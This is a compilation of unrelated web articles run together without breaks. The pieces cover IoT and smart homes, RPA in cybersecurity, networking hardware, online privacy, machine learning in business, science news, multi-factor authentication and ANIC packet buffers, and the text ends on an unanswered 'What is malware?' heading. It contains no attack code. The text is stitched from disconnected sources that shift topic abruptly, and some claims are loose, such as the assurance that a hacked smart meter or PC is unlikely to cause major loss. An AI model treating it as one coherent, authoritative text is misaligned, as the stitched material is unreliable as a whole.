Think about it for a minute. You're on your way home from your stressful day at work. You're unsure whether you have any milk. You check the camera in your fridge. (Yes, I just said camera in your fridge.) You can't see any milk, so you stop at the shop on your way home and buy some more. Now you're tucked up in bed with a nice cup of tea. Quite simply, if these devices couldn't collect data, then it would be unlikely for there to be any benefit to consumers.

However, it's not all about consumers, you know. IoT devices enable businesses to be more efficient in the way that they work. For instance, manufacturers are now beginning to add sensors to their products, resulting in data being transmitted back about how they're performing. This way they're able to identify failing components and swap them out before they cause damage.

And let's not forget about the environment. There's a reason energy companies are shouting about smart metres. The data they receive from your smart metre means that we can use less energy (and save money) and they become more efficient. We're all winning.

What Devices Can Be Connected to IoT?

But what devices does this apply to? Any physical object can be made into an IoT device if it can be connected to the internet and controlled that way. What about a PC? A PC isn't considered an IoT device, and neither are our trusty smartphones (even though they're crammed with sensors).

Now let's get onto the interesting bit. Most IoT devices are recognised through smart home devices. These are devices such as:

- Lighting fixtures
- Home security systems

These devices are all in the same ecosystem, making your life that little bit easier.
Say goodbye to large energy bills by automatically ensuring all lights and electronics are switched off. But wait, there is more. Smart homes can also be used to aid the elderly and those with disabilities. These home systems can use assistive technologies to accommodate an owner's specific difficulties. Voice control can help those with limited sight. Alert systems can be fitted directly to a cochlear implant. Sensors can be worn to monitor for medical emergencies such as falls or seizures. This is great, right?

Well, let's get back to business. In fact, let's talk about "Enterprise IoT".

Industrial and Enterprise IoT

(Also known as Industrial IoT.) This refers to devices used in business and corporate settings. By 2019, IoT was expected to reach up to 9.1 billion devices. Some of the benefits include:

- Monitoring overall business processes
- Improving the customer experience
- Saving time and money
- Enhancing employee productivity
- Integrating and adapting business models
- Making better business decisions
- Generating more revenue

Let's just consider one thing. It's great that these devices can help us. But what if someone uses them for negative reasons? What then?

Privacy Gets a Bit More Confusing

According to Samsung, 7.3 billion devices need to be made secure by 2020. Yikes, someone needs to get a move on. More personal concerns surround consumer choice, ownership of data, and how exactly it is going to be used. There has been some talk about targeted ads becoming, well, a bit more targeted.

Let's take you back to the fridge with the camera. Your fridge is empty. You know that, but you're trying not to think about it. But now local takeaway companies know too. Now you're bombarded with takeaway ads and have no food in the fridge. Although this is great for the fast-food industry, where does it leave consumers? Keeping this balance is vital to consumers' trust and loyalty.

IoT and Cyberwarfare

It's important to note here that anything connected to the internet can be hacked.
Let me lift the veil for you. Hackers are now actively targeting IoT devices such as routers and webcams because of their lack of security. However, there's more. Industrial machinery connected to the IoT can also be hacked. What exactly does that mean? For instance, hackers could hack into a driverless car and take control. This is not ideal. Hackers can also take control of sensors in power plants and cause the controllers to make the wrong decisions. The results of this would be catastrophic. Which means countries are now beginning to plan their cyberwarfare strategies.

But fear not. IoT is relatively safe. You're not likely to suffer any major loss or damage through someone hacking your smart metre or your PC. However, enterprise companies should always remain cautious. Being vulnerable, they should take steps to keep their networks secure, always.

IoT and Cloud Computing

IoT generates vast amounts of data. Most companies will choose to complete their data processing in the cloud. This saves them building large amounts of in-house capacity. Microsoft, Amazon and Google already offer their services on this.

IoT and Smart Cities

Let me guess: you thought IoT services were predominantly for businesses and smart homeowners? Well, you're about to be really surprised. Introducing IoT combined with the real world. Songdo, South Korea, is the first of its kind – a fully equipped and wired smart city. 70% of the business district is complete. Most of the city is being wired, resulting in automation with little to no human intervention.

You thought that was it? Smart buildings can also reduce energy costs. This is done by using sensors to detect how many occupants are in the building. The temperature can then be adjusted automatically. After all, there is nothing worse than sitting in a meeting room with 15 other people and no air conditioning.

And what about traffic in cities? Well, IoT is about to be the answer to your problems.
IoT sensors such as streetlights and smart metres can help reduce traffic, conserve energy, monitor and address environmental concerns, and improve sanitation. Let's talk about the environment a little bit more. Smart cities can help reduce waste and improve efficiency. IoT collects data from these cities in real time and can highlight areas for improvement.

But what could IoT really do for the future? From a consumer perspective, it can make your life much more automated and stress-free. Say you have a meeting this week. If your car was connected to your phone, it could plan the best route in advance. Stuck in traffic? No worries. Your car could send a text to the other party notifying them that you could be late. Not only would this improve safety, it would make your life increasingly stress-free.

It's important to understand that IoT allows for endless opportunities and connections to take place, many of which we cannot even begin to comprehend, although there are some concerns. I think it's safe to say IoT is leading us to an interesting and hopefully stress-free life.
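The predictive-maintenance idea mentioned earlier — manufacturers' sensors flagging a failing component before it causes damage — often boils down to simple thresholding on a stream of readings. The sketch below is a toy illustration: the expected value, tolerance band, and readings are all invented numbers, not any real device's telemetry.

```python
# Toy sketch of sensor-based failure detection: flag a component when too
# many of its readings drift outside an expected band. All thresholds and
# readings here are hypothetical.

def flag_failing(readings, expected=50.0, tolerance=10.0, max_outliers=3):
    """Return True if enough readings fall outside the expected band."""
    outliers = [r for r in readings if abs(r - expected) > tolerance]
    return len(outliers) >= max_outliers

healthy = [49.8, 50.1, 51.2, 48.9, 50.4]
failing = [49.9, 63.0, 64.5, 48.7, 66.1]

print(flag_failing(healthy))  # False
print(flag_failing(failing))  # True
```

Real systems layer smarter statistics (or machine learning) on top, but the loop is the same: collect readings, compare against a baseline, and act before the component fails.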
Automating manual processes with software robots can improve company productivity, reduce errors, boost revenues, and deliver a wide range of additional benefits. One of the most compelling and important applications of robotic process automation (RPA), however, is within the realm of cybersecurity.

It's no secret that cyber threats have grown dramatically in volume, diversity, and consequence in recent years. Ransomware attacks in particular have been prolific of late, but they are just one form of cyber assault, joining everything from distributed denial of service attacks to cyber espionage to intellectual property theft. As organizations – and even national economies – become digitally based and dependent, criminals, hackers, spies, and a host of other bad actors have no shortage of attractive targets.

Despite the wide variety of cyber attack types and objectives, successfully defending against all of them involves a common attribute: speed. The faster an incoming attack can be identified, the faster it can be successfully blocked. When cyber breaches do occur, mitigating their impact as quickly as possible can minimize their damage, while rapidly performing forensics and building new defenses can thwart future attacks.

The volume and scope of cyber attacks long ago surpassed the ability of human security analysts on their own to monitor network traffic to spot and counter known attack signature patterns. That's why one of the main trends within cybersecurity systems and tools has been to automate threat identification and response processes, increasingly with the support of artificial intelligence capabilities. Despite the increasing automation of security controls, however, the processes automated are typically high-level workflows that are common to all cyber defense scenarios and organizations.
Beneath these universal processes are dozens, if not hundreds, of more discrete and individualized processes performed by the people who still play critical roles in the end-to-end cyber defense workflow. For example, security analysts and other professionals must often make final determinations about the seriousness of potential risks, must determine the appropriate level of response, and must interact with the digital security infrastructure in a variety of other ways. Most organizations, for example, would prefer to have humans make the decision to shut down a mission-critical, but potentially compromised, server, rather than having an AI-based security control automatically take it offline.

Given that people will continue to have roles to play in many cyber defense scenarios, it makes sense to make their involvement as efficient and effective as possible. That's where RPA can bring significant benefits by automating many of the manual processes these professionals still use, while allowing them to weigh in with their own knowledge and insight at critical junctures.

Of course, while RPA can add an important layer of automation to the overall cybersecurity workflow, it's important to ensure that the RPA platform itself is secure. In addition, the platform should integrate well with user authentication and authorization systems and other existing security controls to ensure the security of any manual processes it automates. UiPath places a high priority on the security credentials and capabilities of its own RPA platform, which growing numbers of UiPath customers are using to bolster their cybersecurity defenses and responses. For details on how UiPath addresses security in its own operations and products, see this overview.
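The human-in-the-loop pattern described above — routine alerts handled automatically, high-impact actions escalated to an analyst — can be sketched as a small triage function. This is a hypothetical illustration, not UiPath's or any vendor's API: the severity levels, actions, and the `mission_critical` flag are all invented for the example.

```python
# Toy sketch of human-in-the-loop security triage: low-impact alerts get an
# automated response; anything severe, or touching a mission-critical asset
# (like the server example above), is queued for a human decision.
# Severity levels and actions are hypothetical.

AUTO_ACTIONS = {"low": "log", "medium": "quarantine_file"}

def triage(alert):
    """Return (action, needs_human) for a security alert."""
    severity = alert["severity"]
    if severity in AUTO_ACTIONS and not alert.get("mission_critical"):
        return AUTO_ACTIONS[severity], False
    # Severe alerts and mission-critical assets escalate to an analyst
    # rather than being acted on automatically.
    return "escalate_to_analyst", True

print(triage({"severity": "low", "asset": "laptop-17"}))
print(triage({"severity": "high", "asset": "db-prod", "mission_critical": True}))
```

An RPA layer would then automate the busywork around each branch — opening tickets, gathering logs, notifying stakeholders — while the `needs_human` path preserves the analyst's final say.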
Switches, routers, and wireless access points are the essential networking basics. Through them, devices connected to your network can communicate with one another and with other networks, like the Internet. Switches, routers, and wireless access points perform very different functions in a network.

Switches are the foundation of most business networks. A switch acts as a controller, connecting computers, printers, and servers to a network in a building or a campus. Switches allow devices on your network to communicate with each other, as well as with other networks, creating a network of shared resources. Through information sharing and resource allocation, switches save money and increase productivity.

Routers connect multiple networks together. They also connect computers on those networks to the Internet. Routers enable all networked computers to share a single Internet connection, which saves money. A router acts as a dispatcher. It analyzes data being sent across a network, chooses the best route for data to travel, and sends it on its way. Routers connect your business to the world, protect information from security threats, and can even decide which computers receive priority over others. Beyond those basic networking functions, routers come with additional features to make networking easier or more secure. Depending on your security needs, for example, you can choose a router with a firewall, a virtual private network (VPN), or an Internet Protocol (IP) communications system.

An access point* allows devices to connect to the wireless network without cables. A wireless network makes it easy to bring new devices online and provides flexible support to mobile workers. An access point acts like an amplifier for your network. While a router provides the bandwidth, an access point extends that bandwidth so that the network can support many devices, and those devices can access the network from farther away. But an access point does more than simply extend Wi-Fi.
It can also give useful data about the devices on the network, provide proactive security, and serve many other practical purposes.

*Access points support different IEEE standards. Each standard is an amendment that was ratified over time. The standards operate on varying frequencies, deliver different bandwidth, and support different numbers of channels.

To create your wireless network, you can choose between three types of deployment: centralized deployment, converged deployment, and cloud-based deployment. Need help figuring out which deployment is best for your business? Talk to an expert.

1. Centralized deployment
The most common type of wireless network system, centralized deployments are traditionally used in campuses where buildings and networks are in close proximity. This deployment consolidates the wireless network, which makes upgrades easier and facilitates advanced wireless functionality. Controllers are based on-premises and are installed in a centralized location.

2. Converged deployment
For small campuses or branch offices, converged deployments offer consistency in wireless and wired connections. This deployment converges wired and wireless on one network device—an access switch—and performs the dual role of both switch and wireless controller.

3. Cloud-based deployment
This system uses the cloud to manage network devices deployed on-premises at different locations. The solution requires Cisco Meraki cloud-managed devices, which provide full visibility of the network through their dashboards.

Our resources are here to help you understand the security landscape and choose technologies to help safeguard your business. These tools and articles will help you make important communications decisions to help your business scale and stay connected.
We all enjoy life in the digital age, and the Internet provides us connectivity, efficiency and fun. By submitting some of our personal data into online interfaces, we enjoy significant benefits in the form of services tailored to our needs: from banking to work, ecommerce, transport, dating, social media and everything in between. But, by using our personal information, and sometimes posting it in the public domain, we have created a problem. Who owns this personal data once it leaves your keyboard? And if it is misused, who is the negligent party? It might be you.

A day in the life of data: Just how much information do you give away?

Before the development of computer databases, we had certain expectations about privacy and accepted a certain level of public disclosure of personal information. And it seems this statement still rings true. Americans say they care deeply about protecting their data. Pew Research found that being in control of who can get information about us is "very important" to 74% of Americans. However, when it comes to online life, a lot of people do not consider data privacy an important issue. The irony!

With the advent of social media and messaging platforms, we offer information about our personal life freely and voluntarily on a daily basis – and we rarely realize or question it. We regularly post personal (and sometimes compromising) pictures. We share our current location (and indicate where we are not!). We share our relationship status, where we went to school, where we live, work history, birth dates, phone numbers – the list goes on. And we don't even stop to think about it. We are too busy reaping the benefits.

"In general, there has never been so much personal information about individuals as readily accessible as there is today with the Internet," says Kevin Werbach, professor of legal studies and business ethics at Wharton.
“However, what most of us fail to recognize is that once content is posted online, it can be difficult to maintain total control over where it is eventually used, shared, or modified.”
Personal or private – data is open to misuse
Many consumers are unaware of how their data is used or by whom. They operate with an assumption of trust. But data is regularly leveraged in ways the consumer never imagined. The data a user scatters can be harvested and analyzed to reveal a wide variety of personal attributes that, while seemingly innocuous by themselves, can add up to form a skeleton key that social engineers can use to unlock real personal assets or corporate secrets. Shopping habits, political affiliation, relationship status etc., can all be used as steps in the ladder of a cybercrime. Adding a sad face to a post about stray dogs, for example, can reveal what charities you might support. “You may not say much about your salary, but your ‘likes’ on brands or restaurants say a lot. Your daily routines and whereabouts can be deduced from your posts – especially if they’re geo-tagged,” says Maria Fasli, Director of the Institute for Analytics and Data Science, University of Essex. And when it comes to email and messaging services, most of us blindly accept that this information is private. But privacy and the internet don’t go hand in hand. Just who, other than the intended recipient, will receive or have access to the information you provided? Will it be shared with other parties? Is it at risk of being used in ways you did not consent to? Anita L. Allen, professor of law and philosophy at the University of Pennsylvania and a leading expert on privacy issues, says the core questions raised by misuse of the Internet are not new. “It goes way back to the general problem that people will use personal information that they can collect through surreptitious or open means to advance their interest at our expense.
What is new is the ease with which information can be collected and shared, and the ease with which it can be maintained for indefinite periods of time.” So, if we know our online data, both private and professional, can be misused, who is the negligent party? Are you to blame? The more fundamental question is not whether you own your personal data. The real question is whether or not you can control your personal data once it’s out there.
Who owns your personal data and who controls your personal data?
There are definitely blurred lines when it comes to data ownership – and negligence. If you post your social security number online, it’s pretty clear that if something bad happens, you are the negligent party. But when it comes to other personal data shared or communicated, it’s not so black and white. Way back in 2006, Kevin Werbach, who was already concerned about data ownership when using third parties, stated, “There’s a difference between putting information on a purely public site, like your own website that’s accessible to anyone in the world, and putting something on a site like Facebook, which is a controlled, private site available only to its members. The question of who owns the information on these sites is a very interesting one. Most have policies saying they have ownership of anything posted there, but clearly that doesn’t give them leeway to do anything they want with that information. And they have privacy policies that impose limits on how they can use that data. But there’s no simple answer as to whether the information belongs to me or to the site.” And that was more than a decade ago.
Personal Data Security: How can we better protect ourselves?
In the early days of eCommerce, it was common for some people to have misgivings about entering their credit card details into a website. What has taken a bit more time to emerge, however, is awareness of the Internet’s increasing threat to personal privacy.
Today, the technologies behind websites that collect data have become very sophisticated. But this is a little like when cars first made an appearance. People stepped into these hulking, loud and very fast fun machines, and there was an absence of speed limits and seatbelts, and not even a thought of an air bag. It took many tragedies to change laws and promote the development of safety technologies to keep us safe. When it comes to the Internet, we are basically speeding down the highway, standing in the bed of a pick-up truck. It has been fun, but now is the time to start thinking about the parameters that will keep us safe. We are in need of digital seat belts and air bags to help minimize risk and misuse of our personal data.
The first aspect of advanced AI to be adopted in business was the concept of machine learning. Rather than gathering data and programming a computer as was done traditionally, machine learning allows the computer to gather its own data and, in a sense, program itself. By making complex connections between data, the computer can create new useful information. A common misconception is that machine learning is simply about automation. That’s not really the case. We have had computer automation for decades, but only through extensive programming of each “expert system” scenario, use-case and situation that the automation would encounter. Machine Learning allows the automation to act correctly in the face of an unfamiliar situation and make a decision based on its previously ingested data set. Machine learning often begins with a basic decision tree that can be built out into a full neural network of connected data sets. Dealing with large amounts of data and acting on programmed rules are where machine learning out-paces the human mind. A particularly effective application is seen in Facebook’s learning algorithms. By tracking a user’s clicks, searches, likes and time spent reading articles and posts, the algorithm creates a dynamic constantly updating picture of the person’s interests, hobbies, political views, travel plans and many other data points. This data then informs Facebook’s delivery of new content. The system then takes that user profile and curates custom content and advertising that is designed to appeal directly to the user. Each user profile is then combined with the larger set of other user profiles to produce an ongoing constantly refined AI system that learns from user activity and responds with ever-improving suggestions for content or custom-tailored advertising. Under less-advanced modeling, there would still be results, but they aren’t as refined and intuitive. 
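As a toy illustration of this kind of connection-making (a sketch only, with invented data; nothing here reflects any real platform's algorithm), even a few lines of code can surface non-obvious links by counting which interests co-occur across users:

```python
# Toy co-occurrence "recommender" (illustrative only; invented data,
# not any real platform's algorithm). Users who share at least one
# interest with you vote for the other things they like.
from collections import Counter

likes = {
    "ann": {"Game of Thrones", "Lord of the Rings", "Honda Accord"},
    "bob": {"Game of Thrones", "Lord of the Rings"},
    "cat": {"Lord of the Rings", "Honda Accord"},
}

def recommend(user):
    mine = likes[user]
    counts = Counter()
    for other, theirs in likes.items():
        if other != user and mine & theirs:   # shares at least one interest
            counts.update(theirs - mine)      # vote for what they like that you don't
    return [item for item, _ in counts.most_common()]
```

Real systems weigh dozens of interaction types rather than a bare set of likes, but the bridging step is the same shape: find who overlaps with whom, then look at what else they like.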
For example, if a person clicks like on a post about Game of Thrones, it is simple for a computer program to look up the metadata on Game of Thrones and determine that it is a TV show in the fantasy genre. This simple algorithm might then recommend Lord of the Rings. But a more complex machine learning system can go much deeper. Facebook’s newest tracking algorithm tracks every interaction with the site and grades them according to the type of interaction and how “meaningful” they are. While that sounds like a nebulous concept, it’s really just a distillation of a large range of data, including likes, comments, clicks, sharing, time spent reading, and dozens of other factors. Our example of Game of Thrones to Lord of the Rings might learn that people who like both of those things are also likely to like other unrelated things. Perhaps a substantial number of people who are fans of these also tend to drive Honda Accords. The real systems obviously employ more variables than the three we are using for this example, but bridging the obvious connections with the not-so-obvious is the key to successful application of this type of algorithm.
Stumbling Blocks of Early Adopters
Learning about users and customers is an incredibly valuable and important part of business. But at this point, the early adopters are focusing on information aggregation and delivery. Acting intelligently on that information is the next step. Target found this out the hard way. Marketing personnel at the big box retailer knew that new parents are a gold mine of opportunity for their type of store. Their ability to cater to new parents can literally lead to a lifetime of customer loyalty from parent and child. Studies have also shown that this time in an adult’s life is when brand loyalty is most flexible. So Target’s machine learning was set to the task of determining when a customer became pregnant. Purchases such as pregnancy tests and prenatal vitamins could easily be tied to future purchases.
This means a customer who buys maternity clothes in July will probably be shopping for car seats in September, diapers in October, one-year old clothes a year later, and so on. This carries forward to school supplies five to six years later and eventually toys, electronics and everything else a family with children buys. Using the first few indicators as a baseline, Target began offering ads to customers who appeared to be expecting. The results were good, but ran the company into a little trouble over privacy concerns when it mailed a pregnancy-related promotional ad to a teenage girl who had not yet told her father that she was pregnant. The ability to capture a customer profile and tailor products directly is an important step in improving customer satisfaction and sales, but acting on that information correctly is something that can still benefit from the human touch. That’s one reason why AI and machine learning are not so much autopilots as they are co-pilots that still require extensive human guidance.
Analyzing the Real Costs and Savings
The rapidly improving ability of computers to analyze and act on new data is changing things everywhere in the business world. However, the real measure of a successful application of machine learning comes in the benefit per dollar spent. While the eventual goal of deploying machine learning is that you can do the same job faster or better, the decision must be based on total cost, not just speed and quality of work. Imagine an AI program that can automate a job but actually takes 10 times longer to complete the work than a human would. That sounds like a poor investment and a waste of resources. But what if you factor in cost? If the machine learning program and all its maintenance and hardware costs amount to just one twentieth of the total cost of a human doing the job, then there is still a relevant use case that applies to many business problems.
In this scenario, you can actually deploy 10 instances of the program and complete the same work for half the cost.
What Machine Learning Can’t Do (Yet)
Practical application of the principles of AI and machine learning is still in its infancy, but the possibilities seem endless. That’s where some businesses run into problems. Machine learning programs can do things no human can do, like analyze years of data in a few seconds and display results and patterns. But humans are much better at determining if the results make sense in context. Humans also use intuition to respond to smaller data sets, which is something computers have no context for. The solution to a suboptimal machine learning model is often to inject more and more quality data to help the system see more patterns. In one example, different teams competing to create a new predictive system for Netflix to recommend movies found that their models worked best when they were able to combine all the data sets that each team was using. This is useful for areas where you have a large dataset, but it slows the adoption of machine learning in a brand new field of study. Optimized processes done by humans may not experience much improvement when an AI attempts to do the same job. The cost of “teaching” the system by gathering and inputting data and programming the rules for the data could be cost-prohibitive. One famous recent example of machine learning in action was when IBM’s Watson machine learning program faced off against Jeopardy! champions Ken Jennings and Brad Rutter. Armed with an extensive set of encyclopedias and other text, Watson did very well against two of the game’s best human champions and defeated them in a two-game tournament in 2011.
But from a pure business perspective, the multi-year efforts of a team of more than 15 data scientists were not a successful venture. Why? Because Watson’s winnings totaled just $1 million, which is far less than the cost of the project. Obviously, in the Watson case money was not the goal. The $1 million went to charity and the win provided extensive marketing value to IBM while introducing the world to a new level of AI. But that type of project is not in the cards when making a case for real-world business AI. The reality is that aside from a few mature applications such as monitoring large IT systems and data centers, email and spam filtering, travel time and traffic analysis by apps such as Waze or Uber, and other applications of large amounts of data, many AI and machine learning tools are still in the pilot-program stage. At this part of the product lifecycle, they can do a few interesting things, but are not able to produce the total bang-for-the-buck that will revolutionize business. Other existing tools work in a limited fashion but still need extensive human interaction – known as supervised learning – to support and verify the results. These tools often produce only marginal cost savings. These products exist because they fill a niche for the companies that are looking to leverage the latest buzzword – “machine learning” in this case – before they have a complete AI-focused business enterprise strategy in place.
We’ve had the data cloud for some time — now comes data slime. We learned this week that scientists at Harvard were able to store data in Escherichia coli bacteria. Elsewhere, researchers found a second layer of information hidden inside DNA, and Microsoft data scientists used online search to detect pancreatic cancer in some cases even before medical diagnosis. A team of scientists from Harvard University found a way to store data in bacteria as if they were a living hard drive. Using the CRISPR-Cas gene editor, they stored 100 bytes of data — enough to encode a sentence of average length — as pieces of synthetic DNA inside E. coli bacteria. “The results lay the foundations of a multimodal intracellular recording device,” the team wrote in the journal Science, which published the results. Popular Mechanics reported that “these living memory sticks can pass this data on to their descendants, and scientists can later read that data by genotyping the bacteria.” The John D. and Catherine T. MacArthur Foundation is already famous for awarding annual richly endowed “genius” fellowships to creative individuals ranging from poets to neuroscientists. Last week the foundation announced it would fund, with $100 million, “a single proposal designed to help solve a critical problem affecting people, places, or the planet.” The competition, called 100&Change, is open to companies as well as nonprofits located anywhere in the world. “Solving society’s most pressing problems isn’t easy, but we believe it can be done,” said MacArthur President Julia Stasch. “Potential solutions may go unnoticed or under-resourced and are waiting to be brought to scale.” Scientists at the Leiden Institute of Physics have shown that our DNA hides a second layer of information that helps “determine who we are.” Unlike the first, genetic layer, which encodes our genes, the second layer is mechanical and stores information in the way DNA is folded.
“Each of our cells contains two meters of DNA molecules, and these molecules need to be wrapped up tightly to fit inside a single cell,” the team wrote in a news release. “The way in which DNA is folded determines how the letters are read out, and therefore which proteins are actually made. In each organ, only relevant parts of the genetic information are read. The theory suggests that mechanical cues within the DNA structures determine how preferentially DNA folds.” The findings were reported in the journal PLOS One. Data scientists at Microsoft have studied online search data to find early clues to pancreatic cancer. The team “used anonymized Bing search logs to identify people whose queries provided strong evidence that they had recently been diagnosed with pancreatic cancer — a particularly deadly and fast-spreading cancer that is frequently caught too late to cure,” according to a Microsoft blog post. “Then they retroactively analyzed searches for symptoms of the disease over many months prior to identify patterns of queries most likely to signal an eventual diagnosis.” The scientists reported their findings in the Journal of Oncology Practice. “We found that signals about patterns of queries in search logs can predict the future appearance of queries that are highly suggestive of a diagnosis of pancreatic adenocarcinoma,” the authors wrote. “We showed specifically that we can identify 5 percent to 15 percent of cases, while preserving extremely low false-positive rates (0.00001 to 0.0001).” Researchers in Australia have developed light-emitting nanoparticles that can be embedded into glass while preserving its transparency. They say that this “smart” hybrid glass could be “a major step” to 3D display screens, biological sensors and other applications.
“Integrating these nanoparticles into glass, which is usually inert, opens up exciting possibilities for new hybrid materials and devices that can take advantage of the properties of nanoparticles in ways we haven’t been able to do before,” said the study’s lead author, Tim Zhao, from the University of Adelaide’s School of Physical Sciences and Institute for Photonics and Advanced Sensing. “For example, neuroscientists currently use dye injected into the brain and lasers to be able to guide a glass pipette to the site they are interested in. If fluorescent nanoparticles were embedded in the glass pipettes, the unique luminescence of the hybrid glass could act like a torch to guide the pipette directly to the individual neurons of interest.” Scientists from the University of Adelaide, Macquarie University and the University of Melbourne collaborated on the project. The research was published in the journal Advanced Optical Materials.
For every business – big or small – security is of paramount importance in today’s hyper-connected digital space. Because nothing tanks your bottom line more than an intrusion due to a security lapse. There are thousands of security tools deployed to protect against cyber attack vectors, including multi-factor authentication. Multi-factor authentication is important for every commercial establishment because it is the most cost-effective method of protecting assets – usually at little to no cost. The premise behind multi-factor authentication is simple: users have to provide at least two verification factors to gain access to an account. This is because passwords and usernames are relatively easy to acquire. But an additional verification factor, such as a fingerprint, mobile phone, or keycard, is far harder for an attacker to obtain. Multi-factor authentication stops the vast majority of petty criminals in their tracks. In fact, nearly 80% of breaches are caused by stolen or weak passwords. One survey by the Digital Shadows Photon Research team found that a whopping 15 billion credentials are available on the dark web, including usernames with their relevant passwords for online banking!
How Multi-Factor Authentication Works
Multi-factor authentication works by identifying one or several of the following factors:
- Knowledge Factor: Information that only the user is likely to know, such as a PIN or password
- Possession Factor: Credentials based on items that the user is likely to possess, such as a security key, Google Authenticator app, or a mobile phone
- Inherence Factor: Metrics that authorized users own, taking the form of biometrics such as fingerprints, facial recognition, and eye patterns
- Location Factor: Access is granted to devices based on their IP address or geographic location. This can ward off bad actors attempting to breach data from different geographical origins.
Businesses can combine a few or all of the above authentication methods to grant access to individuals.
Why Passwords Are No Longer Enough
Passwords no longer offer the desired level of security for two reasons: i) brute-forcing attempts can eventually break passwords and grant access to accounts, and ii) multiple data breaches have provided bad actors with access to passwords (you can check whether your account has been compromised at haveibeenpwned.com). One piece of outdated security advice held that changing the password regularly and using complex characters would provide a sufficient level of security. That is no longer the case – even if the password is extremely complex. This doesn’t mean you shouldn’t change the password every few months – it means you should add an extra layer of protection. And the fact that most people use the same password across different accounts makes it all too easy for hackers to break into them. For example, let’s say you used the same password for your Google account and your employee account. Suppose someone gains access to the credentials you use for your employee account. They now have access to your Google account – and with it, access to vital pieces of personally identifying information and financial data. However, you can head off this kind of unauthorized access by rolling out multi-factor authentication across your accounts.
The Value of MFA
Multi-factor authentication is admittedly inconvenient, because it takes longer to sign in – but the extra step is a fair trade-off for security. You can never put a price on security. Many employees express their frustration when dealing with a second factor every time they sign in, and MFA can take time and money to set up. Still, the extra steps you and your employees have to go through are worth the security gained. MFA makes your networks, accounts, and databases far more resistant to breaches and hacks.
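The rotating six-digit codes produced by possession-factor apps such as Google Authenticator are typically time-based one-time passwords (TOTP, RFC 6238). As a minimal standard-library sketch of how such a code is derived from a shared secret (an illustration, not a production implementation; use a vetted library in real systems):

```python
# Minimal TOTP sketch per RFC 6238 (HMAC-SHA1, 30-second time steps).
# In practice the shared secret comes from the enrollment QR code.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, period=30, digits=6, at=None):
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if at is None else at) // period)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                                  # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

Because the server and the authenticator app both hold the secret and both compute the code, a stolen password alone is not enough; the attacker would also need a valid code for the current time window.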
Bulletproof Solutions for Remote Working
Businesses have pivoted to a hybrid working model (work from home and office). This has increased the need for stronger cybersecurity measures – and multi-factor authentication is one of the simplest ways of adding more protection. Many businesses are now rolling out adaptive MFA, which uses contextual information to determine which identifying factors should apply to a particular user or account. Adaptive MFA looks at various details such as the user’s device and location to provide more context. For example, a user signing in from their office in a trusted location won’t be asked to provide additional security factors. But if they log in from home or a personal mobile device, they may be asked to provide an additional factor because they are using an untrusted device or connection. Adaptive MFA also solves the problem of inconvenience for most users as long as they are working from a trustworthy connection. Adaptive MFA makes it easy to gain access to accounts without disrupting the user experience. Moreover, it avoids weighing down the IT team with frequent password resets. MFA secures a digital environment and the people in it – and the best part is that it also meets regulatory requirements. For example, regulatory frameworks such as the Payment Card Industry Data Security Standard (PCI-DSS) require MFA to be implemented in certain situations to prevent unauthorized users from accessing payment processing systems.
The Risk of Not Using MFA
The vast majority of data breach attempts can be stopped with MFA. It is an effective means of protection from social engineering, phishing, and brute force attacks and prevents hackers from using stolen credentials or exploiting weak passwords. Adding MFA is the most cost-effective security feature that enterprises can add to prevent cyber security incidents. It is useful even in industries that don’t require MFA for regulatory compliance.
If someone with the resources wants to discover your credentials, they most likely can, especially now that more businesses are working remotely. However, MFA stops them with an extra layer of protection, with little to no effort required on your end. Ready to secure your workforce and roll out cybersecurity measures? Get started today and use multi-factor authentication to protect your employees, your business, and your reputation from cybersecurity incidents.
Host Packet Buffer (HPB)
In order to support multi-core CPUs and multithreaded host applications, ANIC adapters utilize a flexible host packet buffer (HPB) technique. Host memory is segmented into a number of fixed size blocks. The block size is configurable but is typically 2MB or 4MB each. A collection of these host memory blocks is then dynamically pooled together to form a host packet buffer. A specific application thread (often tied to a CPU core) is then explicitly assigned or linked to a given HPB and will only process data that is transferred into its own HPB. Up to 64 independent HPBs can be created (per ANIC adapter) and in turn assigned to up to 64 host application threads. The memory blocks (typically 2MB or 4MB in size) assigned to a host packet buffer (HPB) do not have to be contiguous. In other words, each HPB is composed of blocks of host memory that are randomly spread out in various areas of physical memory. In addition, memory blocks are temporarily assigned to a given HPB by the ANIC adapter, and once an application thread has finished processing all the data from a given memory block, that block can be assigned to a different HPB. An ANIC adapter is configured to intelligently steer packets into specific host packet buffers (HPBs). The benefit of packet steering is that each thread in a multithreaded application (often utilizing multiple CPU cores) can process packets from its own HPB. In this way a security or networking application can take advantage of parallel processing of data, thus achieving higher levels of speed and efficiency. There are three different ways to steer packets into an HPB:
- The ANIC adapter is configured to use its own internal algorithms to evenly and efficiently distribute or load balance packets across a specified number (from 1 to 64) of HPBs. This is done to ensure that no processing thread is overwhelmed with data while others are starved.
- Based upon the results of packet filtering, packets can be steered to specific HPBs. For example, packets that match a specific packet filter rule might all be steered to the same HPB for processing.
- Based upon flow classification, packets are steered to specific HPBs. In other words, specific flows are identified and explicitly steered to a specific HPB for processing.
Packet traffic is typically transferred across the PCIe bus (DMA) for consumption by the host application. However, there may be circumstances under which select traffic must be locally redirected or retransmitted out of one of the ANIC network ports. Packet filtering or flow classification can be used to identify which specific packets or flows must be redirected out of a given port.
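As a hypothetical sketch of the flow-classification steering mode (the function name and hashing choice are illustrative; the adapter's internal algorithm is not documented this way), the key property is that every packet of a given flow maps to the same HPB:

```python
# Hypothetical flow-to-HPB steering sketch (not ANIC's actual logic):
# hash the flow 5-tuple so all packets of one flow land in one buffer.
import hashlib

def hpb_for_flow(src_ip, dst_ip, src_port, dst_port, proto, num_hpbs=64):
    key = f"{src_ip}|{dst_ip}|{src_port}|{dst_port}|{proto}".encode()
    digest = hashlib.sha256(key).digest()
    return int.from_bytes(digest[:4], "big") % num_hpbs  # bucket 0 .. num_hpbs-1
```

Because the mapping is deterministic, the application thread bound to an HPB sees every packet of the flows steered to it, which is what makes per-thread parallel processing safe without cross-thread coordination.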
Expanded Definition: Malware
What is malware?
